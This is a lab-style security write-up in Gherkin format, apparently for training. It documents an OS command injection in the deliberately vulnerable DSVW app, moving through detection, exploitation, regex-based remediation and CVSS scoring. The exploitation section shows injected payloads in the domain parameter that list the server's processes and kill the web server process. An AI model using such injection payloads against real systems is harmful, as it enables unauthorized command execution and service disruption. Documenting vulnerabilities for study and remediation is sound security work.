## Version 1.4.1
## language: en

Feature:
  TOE:
    dsvw
  Category:
    OS Command Injection
  Location:
    http://127.0.0.1:65412/ - domain - (field)
  CWE:
    CWE-78: https://cwe.mitre.org/data/definitions/78.html
    CWE-77: https://cwe.mitre.org/data/definitions/77.html
    CWE-88: https://cwe.mitre.org/data/definitions/88.html
  Rule:
    REQ.173: https://fluidattacks.com/web/rules/173/
  Goal:
    Inject an OS command
  Recommendation:
    Use regex to validate user input

  Background:
  Hacker's software:
    Hacker's software:
    | <Software name>                  | <Version>     |
    | Ubuntu                           | 19.04         |
    | Google Chrome                    | 75.0.3770.100 |
  TOE information:
    Given I am accessing the site http://127.0.0.1:65412/
    And the server is running BaseHTTP version 0.3
    And Python version 2.7.16
    And SQLite version 3

  Scenario: Normal use case
    When I make the next request:
    """
    GET http://127.0.0.1:65412/?domain=www.google.com HTTP/1.1
    """
    Then I can get the following information:
    """
    Server: 127.0.0.53
    Address:  127.0.0.53#53

    Non-authoritative answer:
    Name: www.google.com
    Address: 172.217.30.196
    Name: www.google.com
    Address: 2800:3f0:4005:401::2004
    """

  Scenario: Static detection
    When I look at the code of file DSVW\dsvw.py
    """
    131 elif "domain" in params:
    132    content = subprocess.check_output("nslookup " + params["domain"],
            shell=True,
    133       stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
    """
    Then I see that the user input is not validated
    And I conclude that the site is susceptible to OS command Injection

  Scenario: Dynamic detection
    When I see how the requests are made
    """
    GET http://127.0.0.1:65412/?domain=www.google.com HTTP/1.1
    """
    Then the domain parameter is passed through the url
    When I insert invalid characters for a domain in the domain parameter
    """
    GET http://127.0.0.1:65412/?domain=www.google.com ' HTTP/1.1
    """
    Then the site returns
    """
    /bin/sh: 1: Syntax error: Unterminated quoted string
    """
    Then I can conclude that target parameter is a possible attack vector

  Scenario: Exploitation
    When I make the next request:
    """
    GET http://127.0.0.1:65412/?domain=www.google.com ;  ps -A HTTP/1.1
    """
    Then I get the list of processes of server:
    """
    PID TTY          TIME CMD
    8922  pts/5    00:00:00 bash
    14054 ?        00:00:00 python3
    9105  ?        00:00:00 python3
    9555  tty2     00:00:06 chrome
    9716  tty     00:00:21 chrome
    """
    When I make the next request:
    """
    GET http://127.0.0.1:65412/?domain=www.google.com ; kill 14054  HTTP/1.1
    """
    Then I close the service of the web server
    Then I can conclude that the vulnerability has been exploited

  Scenario: Remediation
    When I use regex to validate the domain:
    """
    132 regex = r"^(?![0-9]+$)(?=([a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}
        [a-zA-Z0-9])))((?:[a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])
        ?(?:\.[a-zA-Z](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?)*))$"
    133 matches = re.match(regex, params["domain"])
    134 if matches:
    135  content = subprocess.check_output("nslookup " + params["domain"],
           shell=True,
    136                    stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
    """
    Then I make the next request:
    """
    GET http://127.0.0.1:65412/?domain=www.google.com ;  ps -A HTTP/1.1
    """
    Then the site doesn't return anything
    Then I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    10/10 (High) - AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  Temporal: Attributes that measure the exploit's popularity and fixability
    9.7/10 (High) - E:H/RL:W/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    8.9/10 (High) - CR:L/IR:L/AR:L/MAV:N/MAC:L/MPR:N/MUI:N/MS:C/MC:H/MI:H/MA:H

  Scenario: Correlations
    No correlations have been found to this date 2019-07-29
